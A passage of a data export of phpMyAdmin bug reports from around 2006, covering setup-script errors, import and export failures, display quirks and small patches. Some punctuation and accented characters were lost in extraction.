Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 1990 https sourceforge.net p phpmyadmin bugs 1990 Original author bwiberg Found in version 2.8.0 beta1","bug"
"24444","8357","SQL query window too wide.
The SQL query Window appears too wide in my Mozilla Mozilla 5.0 X11; U; Linux i686; en US; rv 1.7.8) Gecko 20050927 Debian 1.7.8 1sarge3) since version 2.8.0 beta1.
This was OK in 2.7.0 pl2.
Perhaps just a quirk with Mozilla, but...
Please see the attached screenshot.
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 1991 https sourceforge.net p phpmyadmin bugs 1991 Original author bwiberg Found in version 2.8.0 beta1","bug"
"24444","8358","Config.class.php PHP errors.
With no config.inc.php for example, if one is in the process of running the setup script, or has no need of over riding any defaults); Config.class.php gives this error Warning filemtime ) Stat failed for .
config.inc.php errno=2 No such file or directory) in var www pma dev 2.8.0 beta1 libraries Config.class.php on line 281 which causes a number of header already sent errors.
Basically this makes the setup script ugly as one has to scroll past a page of PHP errors to configure things.
There should probably first be some test whether the file exists to prevent that error.
Original URL https sourceforge.net p phpmyadmin bugs 1992 https sourceforge.net p phpmyadmin bugs 1992 Original author ibennetch Found in version 2.8.0 beta1","bug"
"24444","8359","Check for latest version fails.
In scripts setup.php, trying to check for the latest version returns an error Got invalid version string from server.
Original URL https sourceforge.net p phpmyadmin bugs 1993 https sourceforge.net p phpmyadmin bugs 1993 Original author ibennetch Found in version 2.8.0 beta1","bug"
"24444","8360","print css results in blank table output.
On my Mac OS X with Safari and some other browsers) I see a proper print view of tables and such, but when I go to print them out, the pages have empty tables in them.
Actually the text is there, but it is in white as I found out from copying and pasting the Save as PDF file).
I found that if I add color 000000; to the table enetry in the theme print.css.php files in the themes directories, I could get them to properly print.
Original URL https sourceforge.net p phpmyadmin bugs 1994 https sourceforge.net p phpmyadmin bugs 1994 Original author rkanters Found in version 2.7.0 pl2","bug"
"24444","8361","Changing table default value.
Hello, I was just working on a table in phpMyAdmin using ENUM when I decided to change the values for the ENUM.
Upon changing the default, I am unable to edit any rows within the table and get the following error lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
Fatal error Call to undefined function pma generate common url ) in hsphere shared apache htdocs phpMyAdmin libraries header meta style.inc.php on line 44 I verified that this was a bug by going to another database and replicating the following steps Add a column to a table, in this case ENUM.
Give it the value YES , NO .
Let phpMyAdmin determine a default, and save.
When you browse the table, the rows will gain this new field and by default be set to YES .
Now go back to the structure view and click Edit on that row you just added.
Change the values to true , false and change the default to true.
Save.
Go back to the browse view, and you will notice that the new field now shows up as blank.
Try to edit any row, and you will get that error shown above.
OS WhiteBox Enterprise Linux 3 MySQL 4.1.16 Original URL https sourceforge.net p phpmyadmin bugs 1997 https sourceforge.net p phpmyadmin bugs 1997 Original author jakiao Found in version 2.7.0 pl2","bug"
"24444","8362","Byte Order Mark BOM) not removed on UTF 8 import.
When supplying a UTF 8 encoded file for import using AnywhereRecoding and of course selecting UTF 8), containing a UTF 8 Byte Order Mark BOM), EFBBBF, on the same line as a SQL query, the BOM is not removed but fed into MySQL, yielding a 1064 syntax error) error message.
The MySQL general query log shows 8 lt; 3776 Connect root spinus.its.UU.SE on 3776 Query SET CHARACTER SET utf8 3776 Query SET collation connection = latin1 swedish ci 3776 Query SHOW SESSION VARIABLES LIKE collation connection 3776 Query SHOW SESSION VARIABLES LIKE character set connection 3776 Query SHOW CHARACTER SET 3776 Query SHOW COLLATION 3776 Query SELECT COUNT ) FROM mysql.user 3776 Query SHOW GRANTS 3776 Init DB ortnamndb 3776 Query xc3xafxc2xbbxc2xbfREPLACE socken1 VALUES a16201b , Lillhxc3x83xc2xa4rdal , Svegs och Hede tg , JTL ) 3776 Query SHOW VARIABLES LIKE language 3776 Query xc3xafxc2xbbxc2xbfREPLACE socken1 VALUES a16201b , Lillhxc3x83xc2xa4rdal , Svegs och Hede tg , JTL ) 3776 Query SHOW VARIABLES LIKE language 3776 Query xc3xafxc2xbbxc2xbfREPLACE socken1 VALUES a16201b , Lillhxc3x83xc2xa4rdal , Svegs och Hede tg , JTL ) 3776 Query SHOW VARIABLES LIKE language 3776 Init DB ortnamndb 3776 Query SHOW TABLE STATUS LIKE socken1 3776 Quit gt;8 Notice the strange characters in front of the REPLACE command.
Could you please try this and see if this is iconv related we re using IBM AIX and IBM s libiconv.a iconv ))?
I m attaching an archive Lillhardal.tar.gz) containing Lillhardal.txt the file containing BOM which fails) and a fixed version, without the BOM, Lillhardal OK.txt.
Thanks in advance!
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 1998 https sourceforge.net p phpmyadmin bugs 1998 Original author bwiberg Found in version 2.8.0 beta1","bug"
"24444","8363","Consistency order of truncate drop).
In the tables list view, the first icon is truncate, the second is drop.
But in the dropdown, the first entry is drop, the second is truncate.
In the table view, the first key is primary, the second is index and the third is unique.
Switching the last two would be more logical.
Original URL https sourceforge.net p phpmyadmin bugs 1995 https sourceforge.net p phpmyadmin bugs 1995 Original author olafvdspek Found in version 2.8.0 beta1","bug"
"24444","8364","Backslash in autodetected pmaAbsoluteURI.
I ve encountered this problem after related to installing 2.7.0 pl2 on an IIS 6 server with PHP 5.1.2.
Before applying the patch found in bug report 1398931, I ended up with a base url like http pma.example.com\ which is completely useless.
This did not occur in IE where I only got the double slashes problem, probably because IE is more tolerant to backslashes in URIs), but in Firefox 1.5 others not tested).
Since I d installed PMA in wwwroot, I could solve it adding a stripslashes ) line in the patch.
I don t think this would work if PMA is installed in a subdirectory.
This was originally posted as a comment to bug 1398931.)
Original URL https sourceforge.net p phpmyadmin bugs 1996 https sourceforge.net p phpmyadmin bugs 1996 Original author jesro Found in version 2.7.0 pl2","bug"
"24444","8365","Found a problem in the setup script.
Here s an easy one.
Used the web based setup script to create a config.inc.php file.
Specified in the security section to enable the PHP Info link to appear.
The config.inc.php was created with this line cfg[ ShowPHPInfo ] = true; But the link did not appear.
After checking an old config.inc.php script, I discovered that the line needs to be changed to cfg[ ShowPhpInfo ] = true; Note the case of Php HERE S THE FIX In setup.php, change line 716 to array Show phpinfo output , ShowPhpInfo , Whether to allow users to see phpinfo ) output , FALSE), Take care, Mark Original URL https sourceforge.net p phpmyadmin bugs 1999 https sourceforge.net p phpmyadmin bugs 1999 Original author markpmw Found in version 2.8.0 beta1","bug"
"24444","8366","Setup script dusplay = display.
cfg[ LeftDusplayServers ] = true; not Dusplay but Display Original URL https sourceforge.net p phpmyadmin bugs 2000 https sourceforge.net p phpmyadmin bugs 2000 Original author jsgoupil Found in version 2.8.0 beta1","bug"
"24444","8367","cannot edit table comments.
There s no visible way to edit the comments for a table, once they are created.
After creation of a table with comments, the comment appears in the header.
But how can they be changed?
Original URL https sourceforge.net p phpmyadmin bugs 2001 https sourceforge.net p phpmyadmin bugs 2001 Original author jerdonek Found in version 2.7.0 pl2","bug"
"24444","8368","Warning in libraries display tbl.lib.php.
Warning Invalid argument supplied for foreach ) in srv www htdocs live pma libraries display tbl.lib.p hp on line 680 The only way I ve been able to reproduce this error and it goes as far back as 2.7.0) is by running a stored procedure that returns a resultset.
Running MySQL 5.0.18 log on SUSE LINUX 9.3 from source with Internet Explorer as browser don t ask).
DELIMITER DROP PROCEDURE IF NOT EXISTS `test pma err` CREATE PROCEDURE `test pma err` ) BEGIN SELECT 1,2,3,4,5; END DELIMITER; Patched file attached.
Changed lines between 680 and 685.
Original URL https sourceforge.net p phpmyadmin bugs 2002 https sourceforge.net p phpmyadmin bugs 2002 Original author jcqns Found in version 2.8.0 beta1","bug"
"24444","8369","Server Select quirk.
Managing several Servers not all being always online), in config.ini.php i set cfg[ ServerDefault ] = 0; 0 = no default server) .
Starting pma i can t select the 1st one without selecting another server first due to js onchange ...).
In the next step select database there is a dummy line Databases)... which forces a change.
Such a dummy in the server select field too would be nice !
Original URL https sourceforge.net p phpmyadmin bugs 2003 https sourceforge.net p phpmyadmin bugs 2003 Original author windkiel Found in version 2.8.0 beta1","bug"
"24444","8370","query ending with a quote `).
run a query like SELECT FROM `products` WHERE `products`.`id` = 1` notice the ending quote) and the apache goes wild running PHP 5.0.3 with Apache 2 on Slack) PID USER PR NI VIRT RES SHR S CPU MEM TIME COMMAND 7779 nobody 25 0 13068 9092 2980 R 98.4 1.0 0 24.37 httpd 1499 mysql 16 0 507m 186m 4568 S 2.0 21.1 831 09.47 mysqld after 2 seconds mysql drops to idle, but apache stays and 99 Original URL https sourceforge.net p phpmyadmin bugs 2004 https sourceforge.net p phpmyadmin bugs 2004 Original author serban ghita Found in version 2.7.0 pl2","bug"
"24444","8371","sec to time does not work with from clause.
Hi, I am using phpMyAdmin 2.6.4 pl3, MySQL 4.0.15 and Firefox 1.07 IE 6.0).
Consider these two statements create table a b time); select sec to time b) from a; doesn t work select sec to time 6000) from a; doesn t work select sec to time 6000); works fine It doesn t work.
I always get 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near b ) from a LIMIT 0, 30 at line 1 .
But it works if I don t use phpMyAdmin.
Strange, isn t it?
Cheers, Matthias Original URL https sourceforge.net p phpmyadmin bugs 2005 https sourceforge.net p phpmyadmin bugs 2005 Original author makay Found in version 2.6.4 pl3","bug"
"24444","8372","Privs >user >pass radio butt.
unselectable.
Reported by an anonymous user here http sourceforge.net forum forum.php?thread id=1432761 forum id=72909 Go to the privilege page, edit any user, try to click either radio button at Change Password it will not select or will not stay selected.
For what it s worth, I see it with IE and Firefox for PMA 2.7.0 pl1, 2.8.0 beta1, and CVS at least, haven t tried any others).
I get no warnings about JavaScript errors from my browsers.
Original URL https sourceforge.net p phpmyadmin bugs 2006 https sourceforge.net p phpmyadmin bugs 2006 Original author ibennetch Found in version Latest Git","bug"
"24444","8373","Forbidden 403 on insert.
Server is.... Win2K OS Using MySQL 4.1.7NT PHP 5.0.3 Apache 2.0.54 Client PC is... WinXP Browser is Firefox 1.5.0.1 Was using phpMyAdmin 2.6.4 pl4 fine since it was released.
Now I have just upgraded from 2.6.4 pl4 to 2.8.0.Beta 1 on my Server.
Copied the existing config.inc.php back into the phpmyadim root folder.
All is OK, I can edit tables fields but I can not insert new records to tables.
If I browse table then Insert New Row) I fill in the new data to the fields then click GO, then I get the a page Forbidden You don t have permission to access disp message=Inserted rows amp;nbsp;1[br]Inserted row id amp;nbsp;30 disp query=INSERT INTO `blog` `BlogTime`, `BlogDate`, `BlogArticle`, `BlogID`) VALUES 14 46 00 , 2006 02 06 , fgsdgfsg , NULL); on this server.
Apache 2.0.54 Win32) PHP 5.0.3 Server at phpmyadmin.localhost Port 80 My phpmyadmin apache error log file shows You can see the 403 at the end of the log) 127.0.0.1 [06 Feb 2006 14 49 06 0000] GET themes original img s fulltext.png HTTP 1.1 200 308 127.0.0.1 [06 Feb 2006 14 49 16 0000] GET tbl change.php?db=pigmaster table=blog pos=0 session max rows=200 disp direction=horizontal repeat cells=100 dontlimitchars=0 sql query=SELECT 2A FROM 60blog 60 goto=sql.php 3Fdb 3Dpigmaster 26amp 3Btable 3Dblog 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D200 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bdontlimitchars 3D0 26amp 3Bsql query 3DSELECT 2B 252A 2BFROM 2B 2560blog 2560 HTTP 1.1 200 25951 127.0.0.1 [06 Feb 2006 14 49 24 0000] GET css phpmyadmin.css.php?
js frame=right HTTP 1.1 200 20078 127.0.0.1 [06 Feb 2006 14 49 26 0000] GET js tbl change.js HTTP 1.1 200 10982 127.0.0.1 [06 Feb 2006 14 49 27 0000] GET js keyhandler.js HTTP 1.1 200 1687 127.0.0.1 [06 Feb 2006 14 49 28 0000] GET themes original img b calendar.png HTTP 1.1 200 308 127.0.0.1 [06 Feb 2006 14 49 44 0000] POST tbl replace.php HTTP 1.1 302 127.0.0.1 [06 Feb 2006 14 49 47 0000] GET disp message=Inserted rows 3A 26nbsp 3B1 5Bbr 5DInserted row id 3A 26nbsp 3B30 disp query=INSERT INTO 60blog 60 28 60BlogTime 60 2C 60BlogDate 60 2C 60BlogArticle 60 2C 60BlogID 60 29 VALUES 28 2714 3A46 3A00 27 2C 272006 02 06 27 2C 27fgsdgfsg 27 2C NULL 29 3B HTTP 1.1 403 509 I then tried the beta on another PC connecting to a local and different MySQL server and get the same results.
Also the font text in the beta is much bigger that in phpMyAdmin 2.6.4 pl4.
Any ideas?
Original URL https sourceforge.net p phpmyadmin bugs 2007 https sourceforge.net p phpmyadmin bugs 2007 Original author snifftheglove Found in version 2.8.0 beta1","bug"
"24444","8374","export fails for selected rows after a query.
hello!
please follow these steps in order to reproduce the bug 1\.
click on any table then Browse ; 2\.
click on SQL ; 3\.
make a simple sql, like SELECT FROM `table` WHERE `field 1`= something and `field 2`= something ; 4\.
after the result appears, click Check All , and then click the third image from With selected Export) 5\.
from the image attached please see the options i used for exporting.
6\.
click Go 7\.
from the image attached, please see the result.
mysql error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near WHERE `subsection id` = 546 ) OR `subsection id` = 547 ) O below its information regarding versions and stuff phpMyAdmin SQL Dump version 2.7.0 pl2 http www.phpmyadmin.net Host localhost Generation Time Feb 10, 2006 at 02 20 AM Server version 5.0.18 PHP Version 4.4.2 i use apache 2.0.55 Win32) hope you nail this one!
good luck!
Original URL https sourceforge.net p phpmyadmin bugs 2008 https sourceforge.net p phpmyadmin bugs 2008 Original author spinicrus Found in version 2.7.0 pl2","bug"
"24444","8375","Go back to this page choice not sticky.
open a table for browsing.
edit a record choose at the bottom of the page save and then back to this side after insert = same insert ) press ok I expect the field after insert is selected to same insert actual the file after insert is selected to new insert Original URL https sourceforge.net p phpmyadmin bugs 2009 https sourceforge.net p phpmyadmin bugs 2009 Original author j a n Found in version 2.7.0 pl1","bug"
"24444","8376","Spelling error.
When creating a table, the text on the page telling you to backslash any quotes or backslashes says preceed it with a backslash.
Precede is spelled wrong.
This is in 2.7.0 pl2.
Original URL https sourceforge.net p phpmyadmin bugs 2010 https sourceforge.net p phpmyadmin bugs 2010 Original author jamby Found in version 2.7.0 pl2","bug"
"24444","8377","Insert as new row fails.
When browsing records, editing one, then at the bottom of the screen select Insert as new row then that selecting doesn t hold, jumps back to Save .
[Causing me to mess up records before noticing...
aaaargh!!!]
Feature is present in phpMyAdmin 2.7.0 pl1, so I upgraded to phpMyAdmin 2.7.0 pl2 but the bug remains.
Server i386 redhat linux gnu, Apache 1.3.33, PHP 4.3.10 Local machine w2kpro, 20060111 Firefox 1.5.0.1 Thanks for looking into this!
Original URL https sourceforge.net p phpmyadmin bugs 2011 https sourceforge.net p phpmyadmin bugs 2011 Original author floris Found in version 2.7.0 pl2","bug"
"24444","8378","rowcount for views, unneeded strViewMaxExactCount.
CREATE TABLE `a` `1` tinyint 1) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; INSERT INTO `a` `1`) VALUES 4), 0); CREATE VIEW `testview` AS SELECT `a`.`1` AS `1` from `a`; shows strViewMaxExactCount and no value ) for rows Original URL https sourceforge.net p phpmyadmin bugs 2012 https sourceforge.net p phpmyadmin bugs 2012 Original author cybot tm","bug"
"24444","8379","do not use d in strings.
f.e.
in strViewMaxExactCount so the number cannot be formated sprintf strViewMaxExactCount, PMA formatNumber cfg[ MaxExactCount ], 0), ...) does not work use s instead Original URL https sourceforge.net p phpmyadmin bugs 2013 https sourceforge.net p phpmyadmin bugs 2013 Original author cybot tm","bug"
"24444","8380","Export of query is somewhat hidden.
My boss and several of my coworkers have been confused about how to export what they see in the PMA window.
After executing a query, their first instinct is to click the Export tab at the top of the window, since it s so visible.
They usually don t immediately understand why the result set is different that the Export tab does an implicit SELECT FROM lt;table gt; before showing the export screen.
I show them the two options available at the bottom of the window either select the desired rows and click the Export button, or click the Export link at the bottom to export all rows in the result set.
Even so, this seems to have difficulty sticking in their minds because of the identical wording on the three controls.
The Export button is sufficiently differentiated by being a button and sufficiently clear by the text With selected before it.
The Export link at the bottom, however, gives the user no hint as to how its function differs.
gt; I suggest that the text of the link at the bottom be changed to something like Export entire result set or Export this query to make its purpose clear.
lt; It might also be worthwhile to consider whether moving that entire row of functions Print view, Print view with full texts), Export ) above the result list, rather than below it, would be beneficial and easy discovery.
I omit Insert new row because it doesn t seem to be different from the Insert tab already at the top.
I tested the phpMyAdmin 20060213 053501 CVS snapshot with PHP 5.1.2, MySQL 5.0.18 and Lighttpd 1.4.10 on Mac OS X 10.4.4 PPC.
Original URL https sourceforge.net p phpmyadmin bugs 2014 https sourceforge.net p phpmyadmin bugs 2014 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","8381","Safari Print view prints blank page.
I had never tried the Print view link at the bottom of a result set, but I tried it now in Safari 2.0.2 and noticed that it prints a blank page.
I guess the reason is that you call the JavaScript print ) function in a script at the bottom of the page, but at that point the browser hasn t finished rendering the table, and so it prints what it has so far which is nothing).
gt; I believe the solution would be to call the print ) function through the onload handler instead.
lt;body onload= if typeof window.print) != undefined ) window.print ); gt;) lt; In Firefox 1.5.0.1 it works fine.
I tested the phpMyAdmin 20060213 053501 CVS snapshot with PHP 5.1.2, MySQL 5.0.18 and Lighttpd 1.4.10 on Mac OS X 10.4.4 PPC.
Original URL https sourceforge.net p phpmyadmin bugs 2015 https sourceforge.net p phpmyadmin bugs 2015 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","8382","Display Problems when Making Modifying Tables.
When making a table with more than 1 field basically every table I need to make), or adding a field to a 1 field table the only I can make at the moment), I have the following display problems I do not have an input area for most of the field information!
What I mean to say is, for example, when I make a 2 field table or when I add a field to a table, the only input options displayed are field and type .
There is no input box, checkbox, or anything under Collation , attributes, Null, Default2, Extra, Primary, Index, Unique, or Fulltext, nor is there a submit ability.
It s as though the html just stops there after the type dropdown input box).
Related problems could be that The mbstring PHP extension was not found and you seem to be using a multibyte charset However, I ve done everything I can to make this work The extension dir is correct, php.ini has it uncommented, php.ini is in the windows directory, I can confirm the existance of php mbstring.dll and that the path is correct as well.
Totally clueless on this one as well gt; ).
I ve viewed phpmyadmin through both Firefox and IE, both the latest versions, so I can assume it s not a problem with the browser, but with my installation of phpmyadmin.
Any ideas?
Original URL https sourceforge.net p phpmyadmin bugs 2016 https sourceforge.net p phpmyadmin bugs 2016 Original author captainninja Found in version 2.7.0 pl2","bug"
"24444","8383","Exporting specific rows from query with join.
A coworker of mine discovered a problem in PMA 2.6.0 pl3 and I confirmed that it still exists in yesterday s PMA 2.9.0 dev CVS snapshot.
The problem arises when trying to export specific rows of a query which was produced using a join or other WHERE conditions.
As a simple test case, run the attached setup1.sql which creates tables foo and bar.
Then select some data from foo, joining in bar SELECT foo.
FROM foo, bar WHERE foo.id=bar.foo id ORDER BY bar.id; In the result set, click the checkboxes for the first two rows three and four ) and click the Export button.
PMA generates this SQL for the export SELECT foo.
FROM foo, bar WHERE `id` =3 AND CONVERT `name` USING utf8 ) = three ) OR `id` =4 AND CONVERT `name` USING utf8 ) = four ) ORDER BY bar.id; Click the Refresh link beneath the SQL to execute it normally and we see a problem 1052 Column id in where clause is ambiguous gt; Although PMA is including both table names, it fails to use these table names before the field names.
lt; Suppose we change the tables then so that the columns are not ambiguous.
This is the situation my coworker reported to me.)
Load setup2.sql to set up the table structure a different way.
Now try selecting some data with a join again SELECT foo.
FROM foo, bar WHERE foo.foo id=bar.fk foo id ORDER BY bar.bar id; Again click the first two checkboxes followed by Export.
In the generated SQL we see SELECT foo.
FROM foo, bar WHERE `foo id` =3 AND CONVERT `name` USING utf8 ) = three ) OR `foo id` =4 AND CONVERT `name` USING utf8 ) = four ) ORDER BY bar.bar id; gt; After clicking Refresh, we now see the second problem the result set shows the rows with foo ids 3 and 4 repeated four times.
The problem is that the original query s WHERE conditions are being thrown away!
lt; If it is difficult for PMA to rewrite the SQL statement correctly, then at least it should prevent me from attempting the export.
It is not user friendly that clicking on a PMA interface element should produce either a MySQL error or a completely unexpected result set.
This is with phpMyAdmin 20060213 053501 CVS snapshot PHP 5.1.2 MySQL 5.0.18 Lighttpd 1.4.10 Safari 2.0.2 Mac OS X 10.4.4 PPC Original URL https sourceforge.net p phpmyadmin bugs 2017 https sourceforge.net p phpmyadmin bugs 2017 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","8384","db details structure.php shows the wrong types of all tables.
For example, I have 3 InnoDB tables in a database, and when viewing the structure of the db through db details structure.php, the SUM of table types shows only MyISAM, though I have only 3 InnoDB tables.
Just a cosmetic problem.
Original URL https sourceforge.net p phpmyadmin bugs 2018 https sourceforge.net p phpmyadmin bugs 2018 Original author ywliu Found in version 2.8.0 beta1","bug"
"24444","8385","Sorting not working with PHP Version 5.1.2 1.dotdeb.2.
Sorting a table by selecting a hyperlink does not work PHP Version 5.1.2 1.dotdeb.2, using phpMyAdmin 2.7.0 pl2.
I had to change the following lines from preg match . )
[[ space ]] ASC|DESC)) si , sort expression, matches = array )); sort expression nodir = isset matches[1] ?
trim matches[1]) sort expression; to matches = array ); preg match . )
[[ space ]] ASC|DESC)) si , sort expression, matches); sort expression nodir = isset matches[1] ?
trim matches[1]) sort expression; Original URL https sourceforge.net p phpmyadmin bugs 2019 https sourceforge.net p phpmyadmin bugs 2019 Original author diavolorn Found in version 2.7.0 pl2","bug"
"24444","8386","missing query upload form.
Hi, I was searching for the form which handles the sqlfile upload.
If display tab is full the form is not shown.
So I changed the code to display it as follows.
if display tab === files GLOBALS[ is upload ] ) \{ if display tab === full || display tab === files ) GLOBALS[ is upload ] ) \{ PMA sqlQueryFormUpload ); \} Can you check this please?
Greets rollmotz Original URL https sourceforge.net p phpmyadmin bugs 2020 https sourceforge.net p phpmyadmin bugs 2020 Original author rollmotz Found in version 2.7.0 pl2","bug"
"24444","8387","bad url error after select Databases)... .
1\.
choose any database in the drop down list of the left pane.
2\.
after the structure detais are shown, choose the Databases)... in the drop down list of the left pane.
3\.
a bad url 404) error appears.
this error happens under Mozilla SeaMonkey 1.0.
IE6 has no problem.
I have captured the http headers and found that if you use the following url http phpmyadmin db details structure.php?
server=1 db= the error will happen.
Original URL https sourceforge.net p phpmyadmin bugs 2021 https sourceforge.net p phpmyadmin bugs 2021 Original author wavecn Found in version 2.8.0 beta1","bug"
"24444","8388","Wrong anchors in documentation.
Links in documenation often point to faq..., but it should be faq.
Original URL https sourceforge.net p phpmyadmin bugs 2022 https sourceforge.net p phpmyadmin bugs 2022 Original author nijel Found in version Latest Git","bug"
"24444","8389",".htaccess can cause server errors.
Not as much a bug as unfortunate side effect.
Using the latest CVS which includes the .htaccess file I get an error page 500 Internal Server Error...the apache log file says [[snip] pma .htaccess] php flag not allowed here.
Obviously related to my Apache configuration, but I m concerned that users whose hosts have similar restrictions will see the Internal Server Error page and not realize the .htaccess file is to blame after all, it s hidden ; ) ) Personally, I think the usefulness of having the flag set by default in .htaccess out weighs the potential problems, plus if it becomes an issue in the future, a FAQ entry can simply be added.
I m just bringing it up to call to your attention... Perhaps I should have instead emailed the team rather than posting a bug report, if so I apologize.
Original URL https sourceforge.net p phpmyadmin bugs 2023 https sourceforge.net p phpmyadmin bugs 2023 Original author ibennetch Found in version Latest Git","bug"
"24444","8390","Entry not found in db pages.
One of my databases is a simple user input of car mileages that gets displayed on a web page.
I recently wanted to change some details of the mosts recent addition with ID 2185.
On viewing the table I went to the last page, page 70, but the last entry was 2184.
There was nothing after it.
When I searched the table for 2185 it was found.
MySQL ver 4.1.12 Thanks Bob Original URL https sourceforge.net p phpmyadmin bugs 2024 https sourceforge.net p phpmyadmin bugs 2024 Original author volvoman Found in version 2.7.0 pl2","bug"
"24444","8391","html chars not escaped in query in querybox.
Enter this query into the SQL query box SELECT http www.example.com test.php?id=1 amp;amp;name=test AS test; Run the query, then click the link to edit the query.
The SQL query box will now contain SELECT http www.example.com test.php?id=1 name=test AS test; Notice the amp;amp; entity was changed to just .
Original URL https sourceforge.net p phpmyadmin bugs 2025 https sourceforge.net p phpmyadmin bugs 2025 Original author boone Found in version 2.7.0 pl2","bug"
"24444","8392","Array to string conversion mult submits.inc.php.
database view one or more tables selected performing one of the operations Print view Check table Optimize table Repair table Analayze table gives the following PHP notice Notice Array to string conversion in phpMyAdmin 2.8.0 beta1 libraries mult submits.inc.php on line 12 Notice Array to string conversion in phpMyAdmin 2.8.0 beta1 libraries mult submits.inc.php on line 20 phpMyAdmin 2.8.0 beta1 PHP 4.4.2 MySQL 5.0.18 Original URL https sourceforge.net p phpmyadmin bugs 2026 https sourceforge.net p phpmyadmin bugs 2026 Original author mandabaer Found in version 2.8.0 beta1","bug"
"24444","8393","Undefined variable db in sql.php.
pma starting page Show processes Refresh Notice Undefined variable db in phpMyAdmin 2.8.0 beta1 sql.php on line 742 phpMyAdmin 2.8.0 beta1 MySQL 5.0.18 PHP Version 4.4.2 Original URL https sourceforge.net p phpmyadmin bugs 2027 https sourceforge.net p phpmyadmin bugs 2027 Original author mandabaer Found in version 2.8.0 beta1","bug"
"24444","8394","Missing argument 1 for construct ).
pma starting page Storage Engines selecting e.g.
MyISAM Warning Missing argument 1 for construct ) in pma phpMyAdmin 2.8.0 beta1 libraries storage engines.lib.php on line 174 phpMyAdmin 2.8.0 beta1 MySQL 5.0.18 PHP Version 4.4.2 Original URL https sourceforge.net p phpmyadmin bugs 2028 https sourceforge.net p phpmyadmin bugs 2028 Original author mandabaer Found in version 2.8.0 beta1","bug"
"24444","8395","table latex export cannot be compiled.
Hello, just for fun I tried to compile the latex output of the table export... it doesn t worked...
Original URL https sourceforge.net p phpmyadmin bugs 2029 https sourceforge.net p phpmyadmin bugs 2029 Original author imi1984","bug"
"24444","8396","error on empty blob with trans.
wrapper.
empty Blob field with transformation wrapper imagecreatefromstring ) Passed data is not in WBMP format in transformation wrapper.php on line 76 imagecreatefromstring ) Couldn t create GD Image Stream out of Data in transformation wrapper.php on line 76 imagesx ) supplied argument is not a valid Image resource in transformation wrapper.php on line 77 imagesy ) supplied argument is not a valid Image resource in transformation wrapper.php on line 78 Division by zero in transformation wrapper.php on line 92 imagecreatetruecolor ) Invalid image dimensions in transformation wrapper.php on line 96 imagecopyresampled ) supplied argument is not a valid Image resource in transformation wrapper.php on line 101 imagepng ) supplied argument is not a valid Image resource in transformation wrapper.php on line 107 imagedestroy ) supplied argument is not a valid Image resource in transformation wrapper.php on line 109 imagedestroy ) supplied argument is not a valid Image resource in transformation wrapper.php on line 110 Original URL https sourceforge.net p phpmyadmin bugs 2030 https sourceforge.net p phpmyadmin bugs 2030 Original author cybot tm","bug"
"24444","8397","MYSQLI TYPE DECIMAL != mysqli fetch fields [decimal]) >type.
MYSQLI TYPE DECIMAL = 0 mysqli fetch fields ) gt;type returns 246 for decimal MySQL 5.0.18 server and client) produces Undefined offset 246 in libraries\dbi\mysqli.dbi.lib.php on line 555 Original URL https sourceforge.net p phpmyadmin bugs 2031 https sourceforge.net p phpmyadmin bugs 2031 Original author cybot tm","bug"
"24444","8398","incorrect importing array elements by setup.
1\.
copy my old config.inc.php to config directory 2\.
go to setup script and press Configuration load button 3\.
now press Configuration display button and check all arrays they looks like this cfg[ PDFPageSizes ] = array A3 ; A4 ; A5 ; letter ; legal ; ); resulting configuration was not work Original URL https sourceforge.net p phpmyadmin bugs 2032 https sourceforge.net p phpmyadmin bugs 2032 Original author grickoff Found in version 2.8.0 rc1","bug"
"24444","8399","Setup.php does not save extension.
The extension parameter mysql mysqli) does not seem to be saved by the new setup script in 2.8.0 RC1.
To test, simply start with a blank config, Add a new server, set the extension as desired, Add the server, and display the config.
On mine, the parameter was not recorded, and as a result I found myself using mysql even though mysqli had been selected on the server page.
I found this can be fixed by adding extension to the new server = grab values ...) line.
Please see the attached patch.
Original URL https sourceforge.net p phpmyadmin bugs 2033 https sourceforge.net p phpmyadmin bugs 2033 Original author cyberdog3k Found in version 2.8.0 rc1","bug"
"24444","8400","after user Query with semicolon data export failes.
I have done a user query in the query dialog and this query was prefixed with an semicolon at the end then I click the export link at the bottom of the the query result page.
I switched some options like full inserts, no structur and so on and clicked the button export now.
But instead of displaying the data, the export page displays an error occured after WHRE ... ; LIMIT 0,51 here an example !
PMA SQL ERROR gt; lt;div class= error gt; lt;h1 gt;Fehler lt; h1 gt; lt;p gt; lt;strong gt;SQL Befehl lt; strong gt; lt;a href= http www.mysql.com doc en select.html target= mysql doc gt; lt;img class= icon src= .
themes paradice img b help.png width= 11 height= 11 alt= Dokumentation title= Dokumentation gt; lt; a gt; lt;a href= tbl properties.php?lang=de utf 8 server=1 convcharset=utf 8 collation connection=utf8 unicode ci db=ver2 1 table=fahrzeug export sql query=SELECT 2A FROM 60fahrzeug export 60 WHERE 60fahrzeug id 60 IN 2889325 2C89323 2C90208 2C90209 2C91077 2C93067 2C93068 2C93069 2C93070 2C93071 2C93072 2C93073 2C93412 2C93413 2C93759 2C97231 2C98330 2C99276 2C99277 2C99278 2C99279 2C99280 2C99713 2C99714 2C99715 2C99716 2C99717 2C99718 2C101945 2C101979 2C109958 2C109959 2C109960 2C109961 2C109962 2C109963 2C109964 2C109965 2C109966 2C109967 2C109968 2C109969 2C109970 2C109971 2C109972 2C109973 2C109974 2C109975 2C109976 2C109977 2C109978 2C109979 2C121146 29 3B LIMIT 73 show query=1 gt; lt;img class= icon src= .
